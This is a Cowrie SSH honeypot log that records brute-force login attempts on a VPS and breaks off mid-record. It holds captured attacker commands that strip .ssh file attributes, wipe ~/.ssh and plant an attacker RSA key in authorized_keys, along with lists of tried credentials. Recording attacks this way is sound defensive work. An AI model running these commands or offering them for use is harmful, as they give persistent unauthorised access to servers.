{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:49:43.879277Z","src_ip":"212.227.235.229","session":"47c442819f6e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:44.912357Z","src_ip":"212.227.235.229","session":"c64806a7fc92"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:49:45.017231Z","src_ip":"212.227.235.229","session":"47c442819f6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43002,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ab1f48ec74c","protocol":"ssh","message":"New connection: 212.227.235.229:43002 (1.2.3.4:22) [session: 7ab1f48ec74c]","sensor":"my-vps","timestamp":"2025-09-08T18:49:45.018940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-08T18:49:45.019742Z","src_ip":"212.227.235.229","session":"7ab1f48ec74c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-08T18:49:45.133584Z","src_ip":"212.227.235.229","session":"7ab1f48ec74c"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:45.286824Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:45.288428Z","src_ip":"212.227.235.229","session":"47c442819f6e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:49:45.628192Z","src_ip":"212.227.235.229","session":"7ab1f48ec74c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:45.744122Z","src_ip":"212.227.235.229","session":"7ab1f48ec74c"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:45.749969Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65406,"dst_ip":"1.2.3.4","dst_port":22,"session":"93a14d2091c9","protocol":"ssh","message":"New connection: 217.72.205.35:65406 (1.2.3.4:22) [session: 93a14d2091c9]","sensor":"my-vps","timestamp":"2025-09-08T18:50:16.803304Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:50:16.804688Z","src_ip":"217.72.205.35","session":"93a14d2091c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33988,"dst_ip":"1.2.3.4","dst_port":22,"session":"a12b956f343f","protocol":"ssh","message":"New connection: 212.227.125.160:33988 (1.2.3.4:22) [session: a12b956f343f]","sensor":"my-vps","timestamp":"2025-09-08T18:50:19.202435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:50:20.680880Z","src_ip":"212.227.125.160","session":"a12b956f343f"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-09-08T18:50:20.681882Z","src_ip":"212.227.125.160","session":"a12b956f343f"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":33212,"dst_ip":"1.2.3.4","dst_port":22,"session":"34bbc616943e","protocol":"ssh","message":"New connection: 170.64.157.139:33212 (1.2.3.4:22) [session: 34bbc616943e]","sensor":"my-vps","timestamp":"2025-09-08T18:50:23.141381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:50:23.142636Z","src_ip":"170.64.157.139","session":"34bbc616943e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:50:23.469819Z","src_ip":"170.64.157.139","session":"34bbc616943e"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"321123","message":"login attempt [postgres/321123] failed","sensor":"my-vps","timestamp":"2025-09-08T18:50:24.574230Z","src_ip":"170.64.157.139","session":"34bbc616943e"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:50:25.906066Z","src_ip":"170.64.157.139","session":"34bbc616943e"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:50:27.176048Z","src_ip":"212.227.125.160","session":"a12b956f343f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38104,"dst_ip":"1.2.3.4","dst_port":22,"session":"268d7bfdf5f3","protocol":"ssh","message":"New connection: 212.227.235.229:38104 (1.2.3.4:22) [session: 268d7bfdf5f3]","sensor":"my-vps","timestamp":"2025-09-08T18:50:34.531543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:50:34.532207Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:50:34.819754Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.login.success","username":"root","password":"Mobile","message":"login attempt [root/Mobile] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:50:36.011148Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:50:36.600172Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:50:36.600981Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:50:36.602272Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:50:36.890801Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:50:37.571265Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T18:50:37.572007Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T18:50:37.862156Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:50:37.863183Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54074,"dst_ip":"1.2.3.4","dst_port":22,"session":"d83c0d72bde8","protocol":"ssh","message":"New connection: 212.227.235.229:54074 (1.2.3.4:22) [session: d83c0d72bde8]","sensor":"my-vps","timestamp":"2025-09-08T18:50:38.149694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:50:38.150393Z","src_ip":"212.227.235.229","session":"d83c0d72bde8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:50:38.440419Z","src_ip":"212.227.235.229","session":"d83c0d72bde8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T18:50:39.639149Z","src_ip":"212.227.235.229","session":"d83c0d72bde8"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:50:40.931034Z","src_ip":"212.227.235.229","session":"d83c0d72bde8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54078,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0a53570dea4","protocol":"ssh","message":"New connection: 212.227.235.229:54078 (1.2.3.4:22) [session: a0a53570dea4]","sensor":"my-vps","timestamp":"2025-09-08T18:50:41.216018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:50:41.217062Z","src_ip":"212.227.235.229","session":"a0a53570dea4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:50:41.503378Z","src_ip":"212.227.235.229","session":"a0a53570dea4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:50:42.691813Z","src_ip":"212.227.235.229","session":"a0a53570dea4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:50:42.979364Z","src_ip":"212.227.235.229","session":"a0a53570dea4"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:50:42.980330Z","src_ip":"212.227.235.229","session":"268d7bfdf5f3"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":43716,"dst_ip":"1.2.3.4","dst_port":22,"session":"52d43cdc32aa","protocol":"ssh","message":"New connection: 170.64.157.139:43716 (1.2.3.4:22) [session: 52d43cdc32aa]","sensor":"my-vps","timestamp":"2025-09-08T18:51:33.657172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:51:33.657954Z","src_ip":"170.64.157.139","session":"52d43cdc32aa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:51:33.988518Z","src_ip":"170.64.157.139","session":"52d43cdc32aa"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"p@ssw0rd","message":"login attempt [postgres/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-08T18:51:34.983985Z","src_ip":"170.64.157.139","session":"52d43cdc32aa"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:51:36.321644Z","src_ip":"170.64.157.139","session":"52d43cdc32aa"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:51:41.416351Z","src_ip":"212.227.235.229","session":"e7bf60162e1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36548,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dca74fd8250","protocol":"ssh","message":"New connection: 212.227.235.229:36548 (1.2.3.4:22) [session: 0dca74fd8250]","sensor":"my-vps","timestamp":"2025-09-08T18:51:55.335928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:51:55.337073Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed2551